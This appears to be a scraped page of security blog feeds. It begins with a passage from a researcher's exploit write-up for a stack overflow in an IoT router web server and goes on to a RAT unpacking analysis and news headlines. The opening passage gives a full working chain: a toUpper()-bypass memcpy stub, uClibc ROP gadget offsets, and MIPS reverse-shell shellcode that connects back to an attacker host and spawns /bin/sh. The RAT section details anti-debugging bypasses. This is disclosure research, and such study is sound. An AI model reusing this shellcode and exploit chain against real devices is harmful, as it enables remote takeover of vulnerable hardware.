t4       t5 t6 t7 R8   00000002 fffffffe 00000000 00000006 19999999 00000000 00000057 00425d2c            s0 s1      s2 s3 s4       s5 s6 s7 R16  41414141 41414141 41414141 41414141 41414141 006798f4 006798d0 00000000            t8 t9      k0 k1 gp       sp s8 ra R24  00000132 2ab02820 00000000 00000000 00598790 7dfff808 7dfffa62 41414141        status     lo hi badvaddr    cause pc      0000040c 00059cf8 000001fa 00590cac 00000024 00425dcc (GDB) What do we have hereAdditional examination of the registers shown above revealed that a pointer to a location predictably close to the original header data is left laying around after the toUpper() call.While broken on the final jump in the httpGetMimeTypeByFileName function epilogue, we can examine the data on the stack and find that a portion of our now uppercase header data, including the payload, is stored there.(GDB) x/32s $spx/32s $sp0x7dfff808:      “”0x7dfff809:      “”…0x7dfff81f:      “”0x7dfff820:      “5\r\n”, ‘A’ <repeats 197 times>…0x7dfff8e8:      ‘A’ <repeats 200 times>…0x7dfff9b0:      ‘A’ <repeats 200 times>…0x7dfffa78:      ‘A’ <repeats 200 times>…0x7dfffb40:      ‘A’ <repeats 143 times>, “\r\nCONTENT-LENGTH: 0\r\nACCEPT-ENCODING: GZIP, DEFLATE\r\nAUTH”…0x7dfffc08:      “ORIZATION: BASIC YWRTAW46YWRTAW4=\r\nCONNECTION: KEEP-ALIVE\r\nUPGRADE-INSECURE-REQUESTS: 1\r\nCONTENT-LENGTH: 0\r\n\r\n”0x7dfffc77:      “”0x7dfffc78:      “”0x7dfffc79:      “”…(GDB) By contrast, if we examine the data following the location pointed to by register $s5, we see that the raw header data is still accessible.(GDB) x/32s $s5+0x64x/32s $s5+0x640x679958:        “”0x679959:        “”…0x67995f:        “”0x679960:        “/fs/help”0x679969:        “elp”0x67996d:        “HTTP/1.1″0x679976:        “\n”0x679978:        “ost: 192.168.0.1\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q”…0x679a40:        “=0.5\r\n”, ‘a’ <repeats 194 times>…0x679b08:        ‘a’ <repeats 200 times>…0x679bd0:        ‘a’ <repeats 200 times>…0x679c98:        ‘a’ <repeats 200 times>…0x679d60:        ‘a’ <repeats 146 times>, “\r\nContent-Length: 0\r\nAccept-Encoding: gzip, deflate\r\nA”…0x679e28:        “uthorization: Basic YWRtaW46YWRtaW4=\r\nConnection: keep-alive\r\nUpgrade-Insecure-Requests: 1\r\nContent-Length: 0\r\n\r\n”0x679e9a:        “”0x679e9b:        “”…(GDB) Examining the permissions for that section of memory revealed that the range is executable, giving an initial thought of jumping directly to the raw header.# cat /proc/12518/mapscat /proc/12518/maps00400000-00538000 r-xp 00000000 1f:02 69         /usr/bin/httpd00578000-00594000 rw-p 00138000 1f:02 69         /usr/bin/httpd00594000-006a6000 rwxp 00000000 00:00 0          [heap]2aaa8000-2aaad000 r-xp 00000000 1f:02 359        /lib/ld-uClibc-0.9.30.so2aaad000-2aaae000 rw-p 00000000 00:00 0 2aaae000-2aab2000 rw-s 00000000 00:06 0          /SYSV0000002f (deleted)2aaec000-2aaed000 r–p 00004000 1f:02 359        /lib/ld-uClibc-0.9.30.so…7f401000-7f600000 rwxp 00000000 00:00 0 7fcf7000-7fd0c000 rwxp 00000000 00:00 0          [stack]This ended up not being a worthwhile path due to limitations introduced by toUpper() and an earlier strcmp(). The usage of toUpper() created a condition where any lower case letter had to be considered a bad character. Additionally, since our data passes through a strcmp() call, we could not use any null bytes. These calls left us unable to use any of the following bytes: 0x00, 0x61-0x7a.ExploitationBypassing toUpper()To get around the issue posed by toUpper(), we created a small piece of code calling memcpy() that does not use any lowercase characters or null bytes to execute after gaining control of $ra. With this code, we were able to copy the header data onto the stack in its original form and jump to it for execution.move    $a0, $t9         # put the stack pointer into arg1addiu   $a0, 0x12C       # increase arg1 so we don’t overwrite this codeaddiu   $a1, $s5, 0x198  # load the raw header data pointer into arg2li      $a2, 0x374       # load the size into arg3li      $t9, 0x2AB01E20  # load $t9 with the address of memcpy()jalr    $t9         # call memcpy()move    $t8, $t3         # placeholder to handle delay slot without nullsmove    $t9, $sp         # prep $t9 with the stack pointeraddiu   $t9, 0x14C       # increase the $t9 pointer to the raw headerjalr    $t9         # execute the raw header on the stackmove    $t8, $t3         # placeholder to handle delay slot without nullsBefore we could use this technique, we needed to find a way to gain execution of our memcpy() code. On this device we are fortunate to have an executable stack, however, we did not know where our code would end up. We ended up using a modified ret2libc technique, allowing us to leverage gadgets from uClibc to obtain a pointer to the stack and set up registers for our code.Our first gadget, located at the uClibc offset address of 0x0002fc84, was used to increment the stack pointer by 0x20 to get past any of the memcpy shellcode. To ensure that control of the program execution was retained after this gadget returned we placed the address of our second gadget at the location 0x20+$sp as required below.LOAD:0002FC84                 lw $ra, 0x20+var_8($sp)LOAD:0002FC88                 jr $raLOAD:0002FC8C                 addiu $sp, 0x20The second gadget, located at the uClibc offset address of 0x000155b0, was used to obtain a pointer to the incremented stack buffer. This placed the desired pointer into register $a1. We placed the address of our third gadget at the location 0x58+$sp as required below to ensure that control of the program execution was retained after this gadget returned.LOAD:000155B0                 addiu $a1, $sp, 0x58+var_40LOAD:000155B4                 lw $gp, 0x58+var_48($sp)LOAD:000155B8                 sltiu $v0, 1LOAD:000155BC                 lw $ra, 0x58+var_8($sp)LOAD:000155C0                 jr $raLOAD:000155C4                 addiu $sp, 0x58Finally, a gadget located at the uClibc offset address of 0x000172fc was used to jump into the stack buffer.LOAD:000172FC                 move $t9, $a1LOAD:00017300                 move $a1, $a2LOAD:00017304                 sw $v0, 0x4C($a0)LOAD:00017308                 jr $t9LOAD:0001730C                 addiu $a0, 0x4C # ‘L’We needed to obtain uClibc’s load address so that we could calculate the gadget’s true location to successfully use these gadgets. Looking at the process memory map below, we can see that the executable version of uClibc is loaded at the address 0x2aaee000.# cat /proc/12518/mapscat /proc/12518/maps00400000-00538000 r-xp 00000000 1f:02 69         /usr/bin/httpd00578000-00594000 rw-p 00138000 1f:02 69         /usr/bin/httpd00594000-006a6000 rwxp 00000000 00:00 0          [heap]2aaa8000-2aaad000 r-xp 00000000 1f:02 359        /lib/ld-uClibc-0.9.30.so2aaad000-2aaae000 rw-p 00000000 00:00 0 2aaae000-2aab2000 rw-s 00000000 00:06 0          /SYSV0000002f (deleted)2aaec000-2aaed000 r–p 00004000 1f:02 359        /lib/ld-uClibc-0.9.30.so2aaed000-2aaee000 rw-p 00005000 1f:02 359        /lib/ld-uClibc-0.9.30.so2aaee000-2ab21000 r-xp 00000000 1f:02 363        /lib/libuClibc-0.9.30.so2ab21000-2ab61000 —p 00000000 00:00 0 2ab61000-2ab62000 rw-p 00033000 1f:02 363        /lib/libuClibc-0.9.30.so2ab62000-2ab66000 rw-p 00000000 00:00 0 2ab66000-2ab68000 r-xp 00000000 1f:02 349        /lib/librt-0.9.30.so2ab68000-2aba7000 —p 00000000 00:00 0 …7f001000-7f200000 rwxp 00000000 00:00 0 7f200000-7f201000 —p 00000000 00:00 0 7f201000-7f400000 rwxp 00000000 00:00 0 7f400000-7f401000 —p 00000000 00:00 0 7f401000-7f600000 rwxp 00000000 00:00 0 7fcf7000-7fd0c000 rwxp 00000000 00:00 0          [stack]By taking the load address of uClibc and adding it to the offset address obtained for each of the gadgets, we can get the usable address of the desired code. These addresses can then be strategically placed, causing the execution of our initial code, and subsequently, our payload.LexraMIPS shellcodeWhile LexraMIPS is based off of the MIPS specification, it does deviate enough to cause inconsistencies when attempting to execute some standard MIPS instructions. Due to this, we chose to develop shellcode specifically for LexraMIPS, using a GCC toolchain found here. The code below takes the approach of creating a connection back to the attacker, duplicating stdin, stdout, and stderr into the socket file descriptor, and finally spawning a shell.We start by opening a socket on the device, leveraging a nor technique to avoid any null bytes in our $t7 register. It should be noted that the MIPS $zero register does not contain any null bytes when used.li $t7, -6           # set up $t7 with the value 0xfffffffanor $t7, $t7, $zero  # nor $t7 with zero to get the value 0x05 w/o nullsaddi $a0, $t7, -3    # $a0 must hold family (AF_INET – 0x02) addi $a1, $t7, -3    # $a1 must hold type (SOCK_STREAM – 0x02) slti $a2, $zero, -1  # $a2 must hold protocol (essentially unset – 0x00)li $v0, 4183         # sets the desired syscall to ‘socket’syscall 0x40404      # triggers a syscall, removing null bytesWith a socket opened, we use a connect syscall to create a TCP connection from the device to the attacker. Null bytes were a particular issue in this step, as the default subnet for this device contained a zero. To avoid this issue, we leverage a technique that forced our prepped register values to overflow and result in the desired IP address without using null bytes.sw $v0, -36($sp)     # puts the returned socket reference onto the stacklw $a0, -36($sp)     # $a0 must hold the file descriptor – pulled from the stacksw $a1, -32($sp)     # place socket type (SOCK_STREAM – 0x02) onto the stacklui $t7, 8888        # prep the upper half of $t7 register with the port number ori $t7, $t7, 8888   # or the $t7 register with the desired port number sw $t7, -28($sp)     # place the port onto the stacklui $t7, 0xc0a7      # put the first half of the ip addr into $t7 (192.166)ori $t7, 0xff63      # put the second half of the ip addr into $t7 (255.99)addiu $t7, 0x101     # fix the ip addr (192.166.255.99 –> 192.168.0.100)sw $t7, -26($sp)     # put the ip address onto the stackaddiu $a1, $sp, -30  # put a pointer to the sockaddr struct into $a1li $t7, -17          # load 0xffef into $t7 for later processingnor $a2, $t7, $zero  # $a2 must hold the address length – 0x10li $v0, 4170         # sets the desired syscall to ‘connect’syscall 0x40404      # triggers a syscall, removing null bytesTo ensure that the device accepted our input and properly displayed any output, it is necessary to duplicate the stdin, stdout, and stderr file descriptors. By duplicating each of these I/O file descriptors into our socket, we are able to successfully provide input to the device and view any output via the recently set up connection.lw $t7, -32($sp)     # load $t7 for later file descriptor processinglw $a0, -36($sp)     # put the socket fd into $a0lw $a1, -32($sp)     # put the stderr fd into $a1li $v0, 4063         # sets the desired syscall to ‘dup2’syscall 0x40404      # triggers a syscall, removing null byteslw $t7, -32($sp)     # load $t7 for later file descriptor processinglw $a0, -36($sp)     # put the socket fd into $a0addi $a1, $t7, -1    # put the stdout fd into $a1li $v0, 4063         # sets the desired syscall to ‘dup2’syscall 0x40404      # triggers a syscall, removing null byteslw $t7, -32($sp)     # load $t7 for later file descriptor processinglw $a0, -36($sp)     # put the socket fd into $a0addi $a1, $t7, -2    # put the stdin syscall into $a1li $v0, 4063         # sets the desired syscall to ‘dup2’syscall 0x40404      # triggers a syscall, removing null bytesFinally, we use an execve system call to spawn a shell locally on the device. Since this shell is spawned from our socket, and we already have control over stdin/stdout/stderr, we can control the new shell remotely through our connection.lui $t7, 0x2f2f      # start building the command string    –> //ori $t7, $t7, 0x6269 # continue building the command string –> bisw $t7, -20($sp)     # put the string so far onto the stacklui $t7, 0x6e2f      # continue building the command string –> n/ori $t7, $t7, 0x7368 # continue building the command string –> shsw $t7, -16($sp)     # put the next portion of the string onto the stacksw $zero, -12($sp)   # null terminate the command stringaddiu $a0, $sp, -20  # place a pointer to the command string into arg 1sw $a0, -8($sp)      # place a pointer to the command string array onto the stacksw $zero, -4($sp)    # null terminate the arrayaddiu $a1, $sp, -8   # load the pointer to our command string array into arg 2slti $a2, $zero, -1  # sets $a2 to 0li $v0, 4011         # sets the desired syscall to ‘execve’syscall 0x40404      # triggers a syscall, removing null bytesWith a functional shell on the device, we can continue with our post-exploitation analysis of the device.ConclusionUnfortunately these types of vulnerabilities are all to common in IoT devices. Attackers can find these issues and weaponize them to execute code on vulnerable devices. It is imperative that everyone realizes that IoT devices are computers, and like all computers, the software must be maintained to ensure the device is as secure as possible.Talos will continue to discover and responsibly disclose vulnerabilities, working with vendors to ensure that customers are protected and provide additional deep-dive analysis when necessary. Finding and disclosing zero-day vulnerabilities via coordinated disclosure helps improve the overall security of the devices and software people use on a day-to-day basis. Talos is committed to this effort, developing programmatic ways to identify problems or flaws that could be otherwise exploited by malicious attackers.For vulnerabilities Talos has disclosed, please refer to our vulnerability report portal.You can also review our vulnerability disclosure policy here. […]

  • What we learned by unpacking a recent wave of Imminent RAT infections using AMP
    by noreply@blogger.com (Jaeson Schultz) on January 17, 2019 at 10:08 pm

    This blog post was authored by Chris MarczewskiCisco Talos has been tracking a series of Imminent RAT infections for the past two months following reported data from Cisco Advanced Malware Protection’s (AMP) Exploit Prevention engine. AMP successfully stopped the malware before it was able to infect the host, but an initial analysis showed a strong indication that stages exist before the deployment of the RAT. Surprisingly, the recovered samples showed no sign of Imminent RAT, but instead a commercial grade packer.This was a series of attacks engineered to evade detection and frustrate analysis. From the outside, we have a commercially available, yet affordable packer called “Obsidium” that has been used in the past to protect the intellectual property of some legitimate software vendors. The payload results in a RAT called Imminent that has also been used previously for legitimate purposes. Imminent is a commercially available RAT that retails for $25 to $100, depending upon the size of the customer’s expected user base. While it is not intended for malicious use, in this case, its detection suggested otherwise.Although a Potentially Unwanted Application (PUA) detection approach could suffice, not everyone enables blocking of PUAs. We have other technologies in place, such as the Exploit Prevention engine, that are well-suited to detect such threats. We hope that after reading this research, you’ll have a better understanding of not only what it takes to investigate an attack using a complex packer, but also how AMP is equipped to stop such attacks that planned on successfully evading static detection or thwarting the benefits of dynamic analysis from a malware sandbox.After AMP detected this particular strain of Imminent, and when we saw how complex the packer was that’s used to hide the malware from detection, we decided to investigate further. The following dynamic run shows this:We identified the use of a commercial-grade packer, but we were also curious about the extent of the anti-debugging and anti-virtual machine techniques employed by this particular run of the packer. It starts with several instances of overriding SEH exception handlers. This is accomplished by pushing one handler before and after FS:0, then moving the stack pointer to FS:0. This is possible since the sample is 32-bit and was not compiled with SafeSEH. Intentional access violations and illegal instructions redirect to some preparation code, leading to the initial decryption of malicious code.Since the overrides lead to mostly preparation code, most of this can be skipped by following where all user-land exceptions must go: ntdll->KiUserExceptionDispatcher. You can pass the exception to the application and break just before the jump condition to determine if another exception exists in the chain, or if runtime can continue.Finally, follow the pointer stored at ECX to resolve a CONTEXT structure and determine the EIP for the instruction that will be executed upon calling NtContinue. EIP can be manually resolved by following ECX at this point during runtime and applying the CONTEXT structure for a 32-bit context.The malware decrypts and re-encrypts sections of malicious code one at a time, making it hard to determine a complete timeline for a full decryption point without manually stepping through each section. The cryptographic scheme uses AES per native x86 instructions and wrapper functions.Past the initial code decryption, you start to see some semblance of complex API resolving, the first of which resembles other portions of the binary, but deters analysis overall: junk byte insertion for anti-disassembly.As one might expect, this makes modern disassembler rendering of control flow graphs and function blocks quite messy. Several breakpoints and call returns later, you start to notice API strings getting tossed around the general purpose registers. With some trial and error, it’s not impossible to break on the pivotal return points where the resolved API address is stored in EAX. You can then run the debugger until a call return, but you will encounter some additional access violations and illegal instructions acting as code trampolines, as shown below. The access violations and illegal instructions are a standard feature of the packer if the end user decides to include anti-debugging when running the payload through the packer.It’s also worth mentioning that resolved API addresses should not be broken on, nor jumped to by running until you hit call returns. Call returns are not always used by the packer to move to the desired API. Also, the address of the API is not used directly but is instead invoked a few instructions within the function, & the depth varies for each API. Your best course of action is to break a few calls in the API code early enough to view the original parameters that were haphazardly passed to the resolved API. What’s more, the packer code will check the target of the trampoline within the API code for software breakpoints prior to redirection (0xCC, or int 3 disassembled).After you’ve established such control over the debugging session, you can begin to handle the anti-debugging checks. This is a necessary step to unpack the original payload successfully. Conventional techniques of letting a sample a run and dumping full images or relevant sections of code are not possible in this case due to such checks. With this packer, the anti-debugging checks include the following:Class registration, passed to CreateWindowsEx, containing a callback parameter to be called by CallWindowProc. The callback function itself invokes NtQueryInformationProcess with ProcessDebugPort set as the requested ProcessInformationClass enumeration.The API is called again twice for undocumented ProcessInformationClass enumerations ProcessDebugObjectHandle and ProcessDebugFlags.NtQuerySystemInformation is called with an undocumented enumeration of the SystemInformationClass parameter: SystemKernelDebuggerInformation. In this particular case, the standard SYSTEM_BASIC_INFORMATION structure is not returned, but instead, a SYSTEM_KERNEL_DEBUGGER_INFORMATION structure is returned, containing UCHAR KernelDebuggerEnabled and UCHAR KernelDebuggerNotPresent. The user can bypass this debugger check by toggling the flags appropriately.CloseHandle is called for an invalid handle. When debugging a process, this will generate an exception, rather than resulting in a silent failure of the API. In this case, the exception leads back to the debugger being detected (EnumWindows->MessageBoxA->”Debugger detected…”). Discard the exception when debugging to bypass this check.CreateFileA is called several times to check if file objects with the following debugger-related file names can be instantiated on the host:\\.SICE\\.\NTICE\\.\NTFIREThe next check is interesting in that is resolves more than 20 APIs before commencing with the actual debugger check. Fortunately, only the last few API’s are involved with the check (InternalGetWindowText, IsWindowVisible, and EnumWindows). As discussed earlier, usually getting EnumWindows at this point of the unpacking is a bad sign that you’ve failed a debugger check. In this case, it’s different. The callback function passed to EnumWindows must be handled with a breakpoint and iterated until you see InternalGetWindowText and IsWindowVisible getting called as standalone debugger checks.An arbitrary value is passed to SetLastError, followed by an intentional error. GetLastError is called to check if the set value remains, as expected when debugging.GetCurrentThread grabs the current thread handle and passes it to NtSetInformationThread coupled with the ThreadHideFromDebugger enumeration from THREAD_INFORMATION_CLASS. This will detach the process from the debugger if present.CheckRemoteDebuggerPresentFindWindowW looking for the following debugger class names, rather than window names: ObsidianGUI, WinDbgFrameClass, ID, and OLLYDBGCreateFileW checking for a failed attempt at creating \\.\VBoxGuestThis is just a portion of the anti-debugging phase. Unfortunately, we don’t have the space here to cover the malware’s anti-VM techniques, but this will give you a good start. We decided to proceed with the unpacking of the sample on a bare-metal host to dump the final binary. We identified the final stage as a commercial RAT being used with malicious intent. Pivoting off a dynamic domain name revealed other samples with similarly complex packers (Themida, etc.) The host is not running one, but several control panels for various RAT’s (including the one we unpacked).This was a series of attacks that further complicates detection strategy. In the beginning, we had a commercially available packer that has been used in the past to protect the intellectual property of legitimate software vendors. Further on, the payload resulted in a commercially available RAT that has also been used for legitimate purposes. Although a PUA detection approach could suffice in this case, we have technologies in place such as the Exploit Prevention engine to detect such threats dynamically, in addition to preventing telemetry for further investigations. Attackers are relentlessly attempting new methods of bypassing threat detection. In this particular case, commercially available software was used to no avail. The attacks were successfully stopped by the Cisco Advanced Malware Protection’s (AMP) Exploit Prevention engine, and the resulting event data only helped out more by providing valuable information on what tools the attackers are using against their targets.IOCsOriginal Obsidium packed sample3bc0ae9cd143920a55a4a53c61dd516ce5069f3d9453d2a08fc47273f29d1cf3Unpacked Imminent RAT sample12cca4fcfe311d1136db6736e7f17854746a5e6c7a284c27ea84a5016bf982d7 […]

  • Beers with Talos EP44: Fun with 2018’s Worst and Talks We Want to Hear
    by noreply@blogger.com (Mitch Neff) on January 17, 2019 at 12:59 pm

    Beers with Talos (BWT) Podcast Ep. #44 is now available. Download this episode and subscribe to Beers with Talos:If iTunes and Google Play aren’t your thing, click here.Ep. #44 show notes: Recorded Jan. 7, 2018Most of the episode (after an extended roundtable — we all had a lot to get out after time off), we look back at the 2018 Malware Year in Review, including Olympic Destroyer, VPNFilter, MDM and other unique, large-scale, or otherwise interesting bits of malware that Talos encountered. We also discuss the things we would love to see conference talks about in the new year. Of course, we use that to announce the CFP for Talos Threat Research Summit 2019. If you do defense and want to talk to other defenders, make sure to submit before Jan. 25 here.The timeline:The topics01:00 — Roundtable: Show and tell from holiday vacations16:10 — Top Threats of 2018: “Top” means we called them top, there is no objective measure here.44:10 — What conference talks would be great to see in 20191:00:30 — TTRS 2019 CFP and conference announcement1:10:24 — Parting shots, closing thoughtsThe linksTalos Year in Malware rundownInitial MDM postTalos Threat Research Summit CFP==========Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).Hosted by Mitch Neff (@MitchNeff).Find all episodes here.Subscribe via iTunes (and leave a review!)Check out the Talos Threat Research BlogSubscribe to the Threat Source newsletterFollow Talos on TwitterGive us your feedback and suggestions for topics:beerswithtalos@cisco.com […]

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast A brief daily summary of what is important in information security. The podcast is published every weekday and designed to get you ready for the day with a brief, usually 5 minute long, summary of current network security related events. The content is late breaking, educational and based on listener input as well as on input received by the SANS Internet Stormcenter. You may submit questions and comments via our contact form at https://isc.sans.edu/contact.html .

  • ISC StormCast for Tuesday, January 22nd 2019
    by Johannes B. Ullrich, Ph.D. on January 22, 2019 at 2:15 am

    Suspicious GET Request: Do you know what it is? https://isc.sans.edu/forums/diary/Suspicious+GET+Request+Do+You+Know+What+This+Is/24552/DNS Flag Day https://dnsflagday.net/ […]

  • ISC StormCast for Monday, January 21st 2019
    by Johannes B. Ullrich, Ph.D. on January 21, 2019 at 3:55 am

    Drupal Patches https://www.drupal.org/sa-core-2019-002 https://www.drupal.org/sa-core-2019-001WPML User Data Compromised and Used in EMail To Customers https://wpml.org/2019/01/wpml-org-site-back-to-normal-after-an-attack-during-the-weekend/Targeted Attack Uses Google Drive for Exfiltrationhttps://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/Packet Challenge Solution https://johannes.homepc.org/packet8.txt […]

  • ISC StormCast for Friday, January 18th 2019
    by Johannes B. Ullrich, Ph.D. on January 18, 2019 at 2:05 am

    Android Malware Uses Motion Detection to Evade Analysis https://blog.trendmicro.com/trendlabs-security-intelligence/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics/Twitter for Android Bug https://help.twitter.com/en/protected-tweets-androidIntroduction to WebAuthn/FIDO2 https://medium.com/@herrjemand/introduction-to-webauthn-api-5fd1fb46c285Ransomware As a Service https://www.bleepingcomputer.com/news/security/blackrouter-ransomware-promoted-as-a-raas-by-iranian-developer/ […]

  • ISC StormCast for Thursday, January 17th 2019
    by Johannes B. Ullrich, Ph.D. on January 17, 2019 at 1:47 am

    Emotet and Other Malspam Campaigns Resume After Holiday Break https://isc.sans.edu/forums/diary/Emotet+infections+and+followup+malware/24532/Magecart Delivered Via Compromised Advertising Sites https://blog.trendmicro.com/trendlabs-security-intelligence/new-magecart-attack-delivered-through-compromised-advertising-supply-chain/Premisys Identicard Vulnerabilities https://www.tenable.com/security/research/tra-2019-01ES File Explorer Open Port Vulnerability https://github.com/fs0c131y/ESFileExplorerOpenPortVuln […]

  • ISC StormCast for Wednesday, January 16th 2019
    by Johannes B. Ullrich, Ph.D. on January 16, 2019 at 5:15 am

    MSFT Skype/Team Foundation Server Patches https://isc.sans.edu/forums/diary/Microsoft+Publishes+Patches+for+Skype+for+Business+and+Team+Foundation+Server/24540/SCP Client Vulnerabilities https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txtServer Hosting Companies Trivilally Hacked https://www.websiteplanet.com/blog/report-popular-hosting-hacked/Vulnerabilities in Industrial Remote Controls https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/attacks-against-industrial-machines-via-vulnerable-radio-remote-controllers-security-analysis-and-recommendationsOracle Quarterly Critical Patch Update https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.htm […]

Dark Reading: Security Monitoring Dark Reading: Connecting the Information and Security Community

McAfee Labs – McAfee Blogs Securing Tomorrow. Today.

  • IE Scripting Flaw Still a Threat to Unpatched Systems: Analyzing CVE-2018-8653
    by Philippe Laulheret on January 10, 2019 at 11:27 pm

    Microsoft recently patched a critical flaw in Internet Explorer’s scripting engine that could lead to remote code execution. The vulnerability is being exploited in the wild and was originally reported by a researcher from Google’s Threat Analysis Group. Microsoft released an out-of-band patch to fix the vulnerability before the normal patch cycle. McAfee products received […] The post IE Scripting Flaw Still a Threat to Unpatched Systems: Analyzing CVE-2018-8653 appeared first on McAfee Blogs. […]

  • Ryuk Ransomware Attack: Rush to Attribution Misses the Point
    by John Fokker on January 9, 2019 at 7:00 pm

    Senior analyst Ryan Sherstobitoff contributed to this report. During the past week, an outbreak of Ryuk ransomware that impeded newspaper printing services in the United States has garnered a lot of attention. To determine who was behind the attack many have cited past research that compares code from Ryuk with the older ransomware Hermes to […] The post Ryuk Ransomware Attack: Rush to Attribution Misses the Point appeared first on McAfee Blogs. […]

  • Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems
    by Thomas Roccia on December 19, 2018 at 9:45 pm

    Last week the McAfee Advanced Threat Research team posted an analysis of a new wave of Shamoon “wiper” malware attacks that struck several companies in the Middle East and Europe. In that analysis we discussed one difference to previous Shamoon campaigns. The latest version has a modular approach that allows the wiper to be used […] The post Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems appeared first on McAfee Blogs. […]

  • McAfee Labs Threats Report Examines Cybercriminal Underground, IoT Malware, Other Threats
    by Raj Samani on December 19, 2018 at 5:01 am

    The McAfee Advanced Threat Research team today published the McAfee® Labs Threats Report, December 2018. In this edition, we highlight the notable investigative research and trends in threats statistics and observations gathered by the McAfee Advanced Threat Research and McAfee Labs teams in Q3 of 2018. We are very excited to present to you new […] The post McAfee Labs Threats Report Examines Cybercriminal Underground, IoT Malware, Other Threats appeared first on McAfee Blogs. […]

  • Shamoon Returns to Wipe Systems in Middle East, Europe
    by Alexandre Mundo on December 14, 2018 at 8:32 pm

    Destructive malware has been employed by adversaries for years. Usually such attacks are carefully targeted and can be motivated by ideology, politics, or even financial aims. Destructive attacks have a critical impact on businesses, causing the loss of data or crippling business operations. When a company is impacted, the damage can be significant. Restoration can […] The post Shamoon Returns to Wipe Systems in Middle East, Europe appeared first on McAfee Blogs. […]

SecurityWeek RSS Feed Latest IT Security News and Expert Insights Via RSS Feed

  • ACLU demands Justice Dept. reveal facial recognition tech use
    by Teri Robinson on January 22, 2019 at 3:07 am

    The American Civil Liberties Union (ACLU) and ACLU of Massachusetts are demanding the Justice Department reveal how the FBI and other federal law enforcement agencies are using facial recognition technology. The rights organization has filed a Freedom of Information Act (FOIA) request to compel the department about the use of the technology “and what safeguards,… The post ACLU demands Justice Dept. reveal facial recognition tech use appeared first on SC Media. […]

  • French privacy regulator fines Google $57M for GDPR violation
    by Teri Robinson on January 22, 2019 at 2:40 am

    French regulators hit Google with a $57 million fine for violating GDPR rules that took effect last May by being less than upfront about how user data is collected and used. French data privacy agency CNIL levied the fine, the first against a U.S. company since GDPR took effect last spring, noting that Google “Essential… The post French privacy regulator fines Google $57M for GDPR violation appeared first on SC Media. […]

  • Researchers find Telegram bot chatter is actually Windows malware commands
    by Robert Abel on January 18, 2019 at 8:09 pm

    Decrypted Telegram bot chatter was found to actually be a new Windows malware, dubbed GoodSender, which uses the messenger platform to listen and wait for commands. Forcepoint researchers discovered what it described as a “fairly simple” year old malware that creates a new administrator account that enables remote desktop once it infects a victim’s device.… The post Researchers find Telegram bot chatter is actually Windows malware commands appeared first on SC Media. […]

  • Google Play boots fake apps that spy on devices’ motion sensor data before dropping Anubis malware
    by Bradley Barth on January 18, 2019 at 7:59 pm

    A fake currency converter and a phony battery utility program are among the latest fraudulent apps to be expunged from Google Play, according to researchers who discovered they were infecting users with a version of the Anubis banking malware family. Both fraudulent apps employ a crafty technique to determine whether it is safe for them… The post Google Play boots fake apps that spy on devices’ motion sensor data before dropping Anubis malware appeared first on SC Media. […]

  • Android ES File Explorer open port vulnerability divulged
    by Doug Olenick on January 18, 2019 at 7:46 pm

    A French cybersecurity researcher is reporting that Android ES File Explorer app can allow others on your local network to remotely access a file on your phone. The app, which has more than 100 million Android installs and is designed to allow for the management of all varieties of file types, has a major open… The post Android ES File Explorer open port vulnerability divulged appeared first on SC Media. […]

Google Online Security Blog The latest news and insights from Google on security and safety on the Internet.

  • PHA Family Highlights: Zen and its cousins
    by Eugene Liderman on January 11, 2019 at 10:09 pm

    Posted by Lukasz Siewierski, Android Security & Privacy TeamGoogle Play Protect detects Potentially Harmful Applications (PHAs) which Google Play Protect defines as any mobile app that poses a potential security risk to users or to user data—commonly referred to as “malware.” in a variety of ways, such as static analysis, dynamic analysis, and machine learning. While our systems are great at automatically detecting and protecting against PHAs, we believe the best security comes from the combination of automated scanning and skilled human review. With this blog series we will be sharing our research analysis with the research and broader security community, starting with the PHA family, Zen. Zen uses root permissions on a device to automatically enable a service that creates fake Google accounts. These accounts are created by abusing accessibility services. Zen apps gain access to root permissions from a rooting trojan in its infection chain. In this blog post, we do not differentiate between the rooting component and the component that abuses root: we refer to them interchangeably as Zen. We also describe apps that we think are coming from the same author or a group of authors. All of the PHAs that are mentioned in this blog post were detected and removed by Google Play Protect. BackgroundUncovering PHAs takes a lot of detective work and unraveling the mystery of how they’re possibly connected to other apps takes even more. PHA authors usually try to hide their tracks, so attribution is difficult. Sometimes, we can attribute different apps to the same author based on a small, unique pieces of evidence that suggest similarity, such as a repetition of an exceptionally rare code snippet, asset, or a particular string in the debug logs. Every once in a while, authors leave behind a trace that allows us to attribute not only similar apps, but also multiple different PHA families to the same group or person. However, the actual timeline of the creation of different variants is unclear. In April 2013, we saw the first sample, which made heavy use of dynamic code loading (i.e., fetching executable code from remote sources after the initial app is installed). Dynamic code loading makes it impossible to state what kind of PHA it was. This sample displayed ads from various sources. More recent variants blend rooting capabilities and click fraud. As rooting exploits on Android become less prevalent and lucrative, PHA authors adapt their abuse or monetization strategy to focus on tactics like click fraud. This post doesn’t follow the chronological evolution of Zen, but instead covers relevant samples from least to most complex. Apps with a custom-made advertisement SDKThe simplest PHA from the author’s portfolio used a specially crafted advertisement SDK to create a proxy for all ads-related network traffic. By proxying all requests through a custom server, the real source of ads is opaque. This example shows one possible implementation of this technique. This approach allows the authors to combine ads from third-party advertising networks with ads they created for their own apps. It may even allow them to sell ad space directly to application developers. The advertisement SDK also collects statistics about clicks and impressions to make it easier to track revenue. Selling the ad traffic directly or displaying ads from other sources in a very large volume can provide direct profit to the app author from the advertisers. We have seen two types of apps that use this custom-made SDK. The first are games of very low quality that mimic the experience of popular mobile games. While the counterfeit games claim to provide similar functionality to the popular apps, they are simply used to display ads through a custom advertisement SDK. The second type of apps reveals an evolution in the author’s tactics. Instead of implementing very basic gameplay, the authors pirated and repackaged the original game in their app and bundled with it their advertisement SDK. The only noticeable difference is the game has more ads, including ads on the very first 